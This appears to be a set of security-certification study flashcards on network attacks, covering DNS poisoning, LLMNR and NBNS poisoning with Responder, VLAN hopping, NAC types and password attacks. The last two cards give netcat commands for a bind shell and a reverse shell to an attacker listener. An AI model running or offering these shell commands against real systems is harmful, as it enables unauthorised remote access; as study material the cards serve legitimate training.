Section 9: Network Attacks Flashcards

1
Q

How to prevent DNS Poisoning

A

Use DNSSEC
● DNS Security Extensions (DNSSEC)
o Uses digital signatures based on public-key cryptography
to ensure DNS data is digitally signed by the owner
o The zone owner and the resolvers need to configure their
DNS servers to support DNSSEC

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

LLMNR

A

Based on the DNS packet formatting and allows both IPv4 and IPv6 hosts to perform name resolution on the host if they are on the same local link

Both hosts need to be on the same LAN to use this protocol, this is used in place of a DNS server.

This is only on windows

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

NBNS

A

o NetBIOS Name Service (NBNS or NBT-NS)
▪ Part of the NetBIOS-over-TCP protocol suite that is used as a type of name resolution inside the internal network to translate internal names to IP addresses
▪ NBT-NS uses the host name of a system for its resolution
o By default, Windows machines will first attempt to use LLMNR and then attempt to use NBT-NS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Tool: Responder

A

A command-line tool in Kali Linux that is used to poison NetBIOS, LLMNR, and mDNS name resolution requests

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

VLAN Hopping Methods

A

Double Tagging
Switch Spoofing
MAC Table Overflow Attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Types of NAC Solutions

A

Persistent
● A piece of software installed on a device requesting access to the network

Non-persistent
● Requires the users to connect to the network and log in to a web-based captive portal to download an agent that scans their
devices for compliance

Agentless NAC/Volatile Agent
● Installs the scanning engine on the domain controller instead of
the endpoint device

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Rainbow Table

A

A precomputed hash value table that contains known passwords used for offline password cracking

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Password Spraying

A

Uses a dictionary of common passwords on multiple accounts to bypass authentication mechanisms

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Credential Stuffing

A

Tests stolen user account names and passwords against multiple
websites

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

netcat command to set up bind shell (forward shell)

A

nc -l -p 443 -e cmd.exe
nc -lp 443 -e /bin/sh

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

netcat command to set up reverse shell

A

Set Up Listener (attacker device)
● nc -l -p 443
▪ Connect to Listener (victim device)
● nc 10.1.0.2 443 -e cmd.exe

How well did you know this?
1
Not at all
2
3
4
5
Perfectly